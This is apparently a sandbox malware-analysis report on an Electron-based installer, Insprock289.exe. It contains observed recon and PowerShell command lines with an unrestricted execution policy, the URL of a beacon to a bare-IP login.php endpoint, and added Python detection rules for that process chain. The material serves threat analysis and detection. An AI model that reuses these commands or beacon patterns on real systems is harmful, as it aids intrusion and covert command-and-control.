File name: Insprock289.exe
Full analysis: https://app.any.run/tasks/c7f65e13-cbab-4630-88e9-5b41ea1742a5
Verdict: Malicious activity
Analysis date: March 14, 2025, 12:50:13
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags: nodejs
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5: 438F0C0D9F12A6D97C0DCE2190832BC0
SHA1: 316794630D95E55385EB806E8544DF718E1EABDA
SHA256: 378FB3F303469B11713DDB68409900EEF42386C0B88FF6BBCB588023174507CC
SSDEEP: 786432:xTOQeCGt28GR7DbkHQarIHtTdQUmdGc/BIhOd:xqQeF28GRPbkHQ9WhdGwBIhG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • Insprock289.exe (PID: 5204)
    • Changes powershell execution policy (Unrestricted)

      • Three.exe (PID: 736)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Insprock289.exe (PID: 5204)
    • The process creates files with name similar to system file names

      • Insprock289.exe (PID: 5204)
    • Executable content was dropped or overwritten

      • Insprock289.exe (PID: 5204)
    • Drops 7-zip archiver for unpacking

      • Insprock289.exe (PID: 5204)
    • Reads security settings of Internet Explorer

      • Insprock289.exe (PID: 5204)
    • Starts CMD.EXE for commands execution

      • Three.exe (PID: 736)
    • Starts application with an unusual extension

      • cmd.exe (PID: 4424)
    • Application launched itself

      • Three.exe (PID: 736)
    • The process bypasses the loading of PowerShell profile settings

      • Three.exe (PID: 736)
    • Starts POWERSHELL.EXE for commands execution

      • Three.exe (PID: 736)
    • The process hides Powershell's copyright startup banner

      • Three.exe (PID: 736)
    • Using 'findstr.exe' to search for text patterns in files and output

      • cmd.exe (PID: 7496)
    • Connects to the server without a host name

      • Three.exe (PID: 736)
    • There is functionality for taking screenshot (YARA)

      • Three.exe (PID: 2340)
      • Insprock289.exe (PID: 5204)
    • Process drops legitimate windows executable

      • Insprock289.exe (PID: 5204)
  • INFO

    • The sample compiled with english language support

      • Insprock289.exe (PID: 5204)
    • Checks supported languages

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 736)
      • chcp.com (PID: 7052)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
    • Reads the computer name

      • Insprock289.exe (PID: 5204)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
      • Three.exe (PID: 736)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 2384)
      • BackgroundTransferHost.exe (PID: 6640)
      • BackgroundTransferHost.exe (PID: 736)
      • BackgroundTransferHost.exe (PID: 6800)
      • BackgroundTransferHost.exe (PID: 6112)
    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 6640)
      • Three.exe (PID: 736)
      • slui.exe (PID: 6080)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 6640)
    • Create files in a temporary directory

      • Insprock289.exe (PID: 5204)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 6640)
    • Process checks computer location settings

      • Three.exe (PID: 736)
    • Changes the display of characters in the console

      • cmd.exe (PID: 4424)
    • Node.js compiler has been detected

      • Three.exe (PID: 736)
      • Three.exe (PID: 2340)
      • Three.exe (PID: 3300)
    • Reads the machine GUID from the registry

      • Three.exe (PID: 736)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7784)
      • powershell.exe (PID: 7704)
      • powershell.exe (PID: 2268)
      • powershell.exe (PID: 8092)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable (generic) (52.9)
.exe | Generic Win/DOS Executable (23.5)
.exe | DOS Executable Generic (23.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2018:12:15 22:26:14+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 473088
UninitializedDataSize: 16384
EntryPoint: 0x338f
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 0.7.4.0
ProductVersionNumber: 0.7.4.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
CompanyName: Rack
FileDescription: Leave labor wave
FileVersion: 0.7.4
LegalCopyright: Copyright © 2025 Rack
ProductName: Three
ProductVersion: 0.7.4
All screenshots are available in the full report
Total processes: 185
Monitored processes: 60
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Process launch order as shown in the interactive behavior graph (60 monitored processes; only insprock289.exe, the second backgroundtransferhost.exe and the first three.exe carry command-line details in the graph, the rest are marked "no specs"):

insprock289.exe, backgroundtransferhost.exe, backgroundtransferhost.exe, backgroundtransferhost.exe, backgroundtransferhost.exe, backgroundtransferhost.exe, three.exe, cmd.exe, conhost.exe, chcp.com, three.exe, three.exe, cmd.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, conhost.exe, cmd.exe, conhost.exe, findstr.exe, cmd.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, conhost.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, conhost.exe, powershell.exe, powershell.exe, conhost.exe, conhost.exe, powershell.exe, conhost.exe, conhost.exe, slui.exe

Process information

Note: the cmd.exe and powershell.exe children of Three.exe are requested by their C:\WINDOWS\system32\ paths but actually load from C:\Windows\SysWOW64\ and pull in wow64.dll, wow64win.dll and wow64cpu.dll. Three.exe is a 32-bit process, so WOW64 file-system redirection applies to the processes it creates; the 32-bit shells are not evidence of tampering by themselves.

PID 668 (parent process: cmd.exe)
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  c:\windows\system32\conhost.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\shcore.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll

PID 672 (parent process: powershell.exe)
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): same list as PID 668

PID 736 (parent process: svchost.exe)
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Download/Upload Host
Exit code: 1
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
  c:\windows\system32\backgroundtransferhost.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\kernel.appcore.dll
  c:\windows\system32\bcryptprimitives.dll

PID 736 (parent process: Insprock289.exe; the PID was reused after the BackgroundTransferHost.exe instance above exited)
CMD: C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
Path: C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe
User: admin
Company: Rack
Integrity Level: MEDIUM
Description: Leave labor wave
Exit code: 134
Version: 0.7.4
Modules (images):
  c:\users\admin\appdata\local\temp\2tzicnrzuzfcgickizc2yplrndk\three.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\apphelp.dll
  c:\windows\syswow64\oleaut32.dll

PID 1012 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
Path: C:\Windows\SysWOW64\cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
  c:\windows\syswow64\cmd.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\apphelp.dll
  c:\windows\syswow64\msvcrt.dll

PID 1280 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
  c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\apphelp.dll
  c:\windows\syswow64\msvcrt.dll

PID 1568 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): same list as PID 1280

PID 2140 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): same list as PID 1280

PID 2240 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): same list as PID 1280

PID 2268 (parent process: Three.exe)
CMD: C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): same list as PID 1280

The powershell.exe instances share one command line: -NoProfile and -NoLogo suppress profile loading and the banner, -NoExit keeps the host alive, and -Command - makes PowerShell read its script from standard input, so nothing of the executed script appears on the command line. Together with -ExecutionPolicy Unrestricted this is the pattern behind the "Changes powershell execution policy", "bypasses the loading of PowerShell profile settings" and "hides Powershell's copyright startup banner" indicators above; recovering the script itself needs PowerShell script-block logging (event 4104) or the sandbox's full report, not the process tree.
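The chain in the table above, a third-party 32-bit binary running from a random subdirectory of %LOCALAPPDATA%\Temp that spawns cmd.exe to echo %COMPUTERNAME%.%USERDNSDOMAIN% and then repeatedly starts powershell.exe with -ExecutionPolicy Unrestricted and -Command -, is the kind of thing a process-creation detection rule should catch without needing the script body. The Python below is an added example written for this page, not ANY.RUN's code and not the sample's; it runs four simple rules over a handful of constructed process events modeled on the table (the ProcEvent schema, the benign control event with PID 4000 and the Desktop path for Insprock289.exe are assumptions, not data from the report).

```python
"""Added example: flag the Temp-resident binary -> cmd/powershell chain seen in the report.

The ProcEvent schema and SAMPLE_EVENTS are constructed for this page; they mirror
the report's process table but are not an export of it.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str         # full path of the process image
    cmdline: str       # command line as logged
    parent_image: str  # full path of the parent's image


THREE = r"C:\Users\admin\AppData\Local\Temp\2tzicnRZuZfCGIckIZC2YPlrndK\Three.exe"

# Constructed sample events modeled on the report (PIDs and paths as listed there).
SAMPLE_EVENTS = [
    ProcEvent(736, THREE, THREE, r"C:\Users\admin\Desktop\Insprock289.exe"),  # parent path assumed
    ProcEvent(1012, r"C:\Windows\SysWOW64\cmd.exe",
              r'C:\WINDOWS\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"',
              THREE),
    ProcEvent(1280, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo "
              r"-InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
              THREE),
    # Benign control (constructed): an interactive shell from Explorer with the default policy.
    ProcEvent(4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-Process",
              r"C:\Windows\explorer.exe"),
]

# Parent image living one directory below %LOCALAPPDATA%\Temp (where the NSIS payload was unpacked).
TEMP_SUBDIR_RE = re.compile(r"\\AppData\\Local\\Temp\\[^\\]+\\", re.IGNORECASE)
# powershell.exe accepts unambiguous prefixes of -ExecutionPolicy (-ex, -exec, -ep), so match those too.
WEAK_POLICY_RE = re.compile(r"-(?:ExecutionPolicy|exec|ex|ep)\s+(?:Unrestricted|Bypass)\b", re.IGNORECASE)
# Host/domain discovery through environment variables echoed by cmd.exe.
HOST_RECON_RE = re.compile(r"%(?:COMPUTERNAME|USERDNSDOMAIN|USERDOMAIN)%", re.IGNORECASE)
# '-Command -' reads the script from stdin, leaving no script content on the command line.
STDIN_SCRIPT_RE = re.compile(r"-Command\s+-(?:\s|$)", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, rule) tuples for every rule that fires on an event."""
    findings = []
    for ev in events:
        name = basename(ev.image)
        if name in SHELLS and TEMP_SUBDIR_RE.search(ev.parent_image):
            findings.append((ev.pid, "shell spawned by a binary running from a Temp subdirectory"))
        if name == "powershell.exe" and WEAK_POLICY_RE.search(ev.cmdline):
            findings.append((ev.pid, "powershell started with Unrestricted/Bypass execution policy"))
        if name == "powershell.exe" and STDIN_SCRIPT_RE.search(ev.cmdline):
            findings.append((ev.pid, "powershell script supplied over stdin (-Command -)"))
        if name == "cmd.exe" and HOST_RECON_RE.search(ev.cmdline):
            findings.append((ev.pid, "host and domain name collected via cmd echo"))
    return findings


def flagged_pids(events):
    """Distinct PIDs with at least one finding, in first-seen order."""
    seen = []
    for pid, _ in analyze(events):
        if pid not in seen:
            seen.append(pid)
    return seen


if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(f"PID {pid}: {rule}")
```

On the constructed events the rules fire on PIDs 1012 and 1280 only; the explorer-launched control shell with the default policy stays quiet. The Temp-subdirectory rule is the one that gives the other three their context: a weakened execution policy or a stdin-fed script from an installer or admin tooling is common, the same flags from a freshly unpacked binary under Temp much less so.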
Total events: 106 349
Read events: 106 334
Write events: 15
Delete events: 0

Modification events

All keys below sit under HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\ (written as <Cache> here); every row is a write of the value CachePrefix.

PID 2384  BackgroundTransferHost.exe  Key: <Cache>\Content  Value: (empty)
PID 2384  BackgroundTransferHost.exe  Key: <Cache>\Cookies  Value: Cookie:
PID 2384  BackgroundTransferHost.exe  Key: <Cache>\History  Value: Visited:
PID 6640  BackgroundTransferHost.exe  Key: <Cache>\Content  Value: (empty)
PID 6640  BackgroundTransferHost.exe  Key: <Cache>\Cookies  Value: Cookie:
PID 6640  BackgroundTransferHost.exe  Key: <Cache>\History  Value: Visited:
PID 736   BackgroundTransferHost.exe  Key: <Cache>\Content  Value: (empty)
PID 736   BackgroundTransferHost.exe  Key: <Cache>\Cookies  Value: Cookie:
PID 736   BackgroundTransferHost.exe  Key: <Cache>\History  Value: Visited:
PID 6112  BackgroundTransferHost.exe  Key: <Cache>\Content  Value: (empty)
Executable files: 17
Suspicious files: 128
Text files: 68
Unknown types: 0

Dropped files (all by PID 5204, Insprock289.exe; this excerpt lists 10 of them)

C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\app-32.7z
  Type, MD5, SHA256: not listed
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\icudtl.dat
  Type, MD5, SHA256: not listed
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSES.chromium.html
  Type, MD5, SHA256: not listed
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\System.dll
  Type: executable
  MD5: 0D7AD4F45DC6F5AA87F606D0331C6901
  SHA256: 3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_100_percent.pak
  Type: binary
  MD5: 001AA2A7D5DCAF2D0987804A37E21DB9
  SHA256: 0B84B7680630DD51CB36A2FCDD7CC3B031636FE6B91F81772822BE9E514132FE
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\chrome_200_percent.pak
  Type: binary
  MD5: 749E5FF4A826E7FFE8421634520B7E61
  SHA256: 8E2AFD2AD5BD4F4EDFE739AD503FF6896410D097665D40E99C56C440A8EBC36E
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\cs.pak
  Type: binary
  MD5: 350BE83206B77C0CB2020F514016E173
  SHA256: 383CF4EE39F0CB05334ED1FC85F75DD51EC0B0D8FB6E7BD0789AF9CE46ACDCE0
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\LICENSE.electron.txt
  Type: text
  MD5: 4D42118D35941E0F664DDDBD83F633C5
  SHA256: 5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\el.pak
  Type: binary
  MD5: B4EA6881005579391034881E6ED415CE
  SHA256: 1ACEE2644BC48D4AA618DB2BDBA6DA2E384CAD19589E65057FE0E7D9D6549446
C:\Users\admin\AppData\Local\Temp\nsfDE0E.tmp\7z-out\locales\es.pak
  Type: binary
  MD5: 91D5FD37CD425E5C6804509D442E1096
  SHA256: 03D69E086401040F32E5C258B8D6D9E1BC7CDA53CBACA732D27BAB40A75576A0

Reading the drop set: an nsf*.tmp working directory, app-32.7z unpacked into 7z-out, and icudtl.dat, chrome_*_percent.pak, locales\*.pak, LICENSES.chromium.html and LICENSE.electron.txt together are the standard layout of an Electron application packaged by an NSIS installer, which also explains the "nodejs" tag and the "Node.js compiler has been detected" indicator on Three.exe. System.dll in the same nsf*.tmp directory is the NSIS System plug-in that installers use to call Win32 APIs; countless legitimate installers drop it, so the "creating System.dll in Temp" indicator is weak evidence on its own. What makes this run malicious is what the unpacked Electron app does afterwards (host recon, stdin-fed PowerShell, the bare-IP beacon below), not the packaging.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 8
TCP/UDP connections: 31
DNS requests: 16
Threats: 0

HTTP requests (Type and Size were empty for every row in this excerpt; the CN column is the country code)

PID 5496  MoUsoCoreWorker.exe  GET 200  23.48.23.183:80  Country: unknown  Reputation: whitelisted
  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
PID 4740  backgroundTaskHost.exe  GET 200  184.30.131.245:80  Country: unknown  Reputation: whitelisted
  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
PID 6640  BackgroundTransferHost.exe  GET 200  184.30.131.245:80  Country: unknown  Reputation: whitelisted
  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
PID 736  Three.exe  GET 200  217.197.107.91:80  Country: unknown  Reputation: unknown
  http://217.197.107.91/login.php?event=init&id=dGVzdA==&data=… (remainder of the request is not preserved in this excerpt)
(PID/process not listed)  GET 200  184.30.131.245:80  Country: unknown  Reputation: whitelisted
  http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
PID 6228  SIHClient.exe  GET 200  23.222.82.102:80  Country: unknown  Reputation: whitelisted
  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
PID 2104  svchost.exe  GET 200  23.48.23.183:80  Country: unknown  Reputation: whitelisted
  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
PID 6228  SIHClient.exe  GET 200  23.222.82.102:80  Country: unknown  Reputation: whitelisted
  http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl

Seven of the eight requests are CRL and OCSP fetches by Windows components and are background noise. The one request from Three.exe is the "Connects to the server without a host name" indicator: plain HTTP to a bare IPv4 address, a PHP endpoint, an event=init parameter, and an id value dGVzdA== that base64-decodes to the string test. The request got a 200, so the endpoint was live at analysis time; 217.197.107.91 and the login.php path are the network indicators worth extracting from this run.

Connections (10 of the 31 TCP/UDP connections are listed in this excerpt; CN is the country code)

(PID/process not listed)  20.73.194.208:443  settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
(PID/process not listed)  192.168.100.255:138  (no domain, ASN or country)  whitelisted
PID 5496  MoUsoCoreWorker.exe  23.48.23.183:80  crl.microsoft.com  Akamai International B.V.  DE  whitelisted
PID 2104  svchost.exe  23.48.23.183:80  crl.microsoft.com  Akamai International B.V.  DE  whitelisted
PID 6544  svchost.exe  20.190.160.67:443  login.live.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
(PID/process not listed)  40.113.110.67:443  client.wns.windows.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
(PID/process not listed)  184.30.131.245:80  ocsp.digicert.com  AKAMAI-AS  US  whitelisted
(PID/process not listed)  20.190.160.67:443  login.live.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 3216  svchost.exe  40.113.110.67:443  client.wns.windows.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted
PID 4740  backgroundTaskHost.exe  20.31.169.57:443  arc.msn.com  MICROSOFT-CORP-MSN-AS-BLOCK  NL  whitelisted

Every connection shown here is whitelisted Windows telemetry, PKI or NetBIOS broadcast traffic. The Three.exe connection to 217.197.107.91:80 from the HTTP table is not among the ten rows in this excerpt, so the full report's connection list and PCAP are needed to see that session.

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.174
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.183
  • 23.48.23.177
  • 23.48.23.141
  • 23.48.23.150
  • 23.48.23.139
  • 23.48.23.194
  • 23.48.23.169
  • 23.48.23.180
  • 23.48.23.176
whitelisted
login.live.com
  • 20.190.160.67
  • 20.190.160.17
  • 40.126.32.133
  • 40.126.32.134
  • 40.126.32.72
  • 40.126.32.76
  • 20.190.160.65
  • 20.190.160.22
whitelisted
client.wns.windows.com
  • 40.113.110.67
whitelisted
ocsp.digicert.com
  • 184.30.131.245
whitelisted
arc.msn.com
  • 20.31.169.57
whitelisted
www.bing.com
  • 2.19.122.55
  • 2.19.122.59
  • 2.19.122.65
  • 2.19.122.54
  • 2.19.122.63
  • 2.19.122.57
  • 2.19.122.64
  • 2.19.122.60
  • 2.19.122.58
whitelisted
www.google.com
  • 142.250.186.164
whitelisted
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info